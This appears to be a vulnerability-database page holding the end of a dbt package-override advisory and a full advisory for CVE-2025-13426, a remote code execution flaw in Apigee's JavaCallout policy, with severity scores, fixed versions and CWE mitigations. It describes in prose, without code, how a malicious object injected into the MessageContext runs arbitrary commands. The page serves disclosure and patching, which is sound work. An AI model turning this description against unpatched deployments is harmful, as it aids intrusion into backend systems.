      "url": "https://www.elementary-data.com/post/are-dbt-packages-secure-the-answer-lies-in-your-dwh-policies"
    },
    {
      "type": "WEB",
      "url": "https://www.equalexperts.com/blog/tech-focus/are-you-at-risk-from-this-critical-dbt-vulnerability"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "dbt has an implicit override for built-in materializations from installed packages"
}

GHSA-PPCV-W2RM-62GC

Vulnerability from github – Published: 2025-12-06 00:31 – Updated: 2025-12-06 00:31
VLAI
Details

A vulnerability exists in Google Apigee's JavaCallout policy https://docs.apigee.com/api-platform/reference/policies/java-callout-policy that allows for remote code execution.

It is possible for a user to write a JavaCallout that injected a malicious object into the MessageContext to execute arbitrary Java code and system commands at runtime, leading to unauthorized access to data, lateral movement within the network, and access to backend systems.

The Apigee hybrid versions below have all been updated to protect from this vulnerability: * Hybrid_1.11.2+ * Hybrid_1.12.4+ * Hybrid_1.13.3+ * Hybrid_1.14.1+ * OPDK_5202+ * OPDK_5300+

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-13426"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-05T22:15:47Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability exists in Google  Apigee\u0027s JavaCallout policy https://docs.apigee.com/api-platform/reference/policies/java-callout-policy  that allows for remote code execution.\n\nIt is possible for a user to write a JavaCallout that injected a malicious object into the MessageContext to execute arbitrary Java code and system commands at runtime,\u00a0leading to unauthorized access to data, lateral movement within the network, and access to backend systems.\n\nThe Apigee hybrid versions below have all been updated to protect from this vulnerability:\n  *  Hybrid_1.11.2+\n  *  Hybrid_1.12.4+\n  *  Hybrid_1.13.3+\n  *  Hybrid_1.14.1+\n  *  OPDK_5202+\n  *  OPDK_5300+",
  "id": "GHSA-ppcv-w2rm-62gc",
  "modified": "2025-12-06T00:31:35Z",
  "published": "2025-12-06T00:31:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13426"
    },
    {
      "type": "WEB",
      "url": "https://docs.cloud.google.com/apigee/docs/hybrid/release-notes#March_01_2025"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Clear",
      "type": "CVSS_V4"
    }
  ]
}

Mitigation
Implementation

Strategy: Input Validation

For any externally-influenced input, check the input against an allowlist of acceptable values.

Mitigation
Implementation Architecture and Design

Strategy: Refactoring

Refactor the code so that it does not need to be dynamically managed.

No CAPEC attack patterns related to this CWE.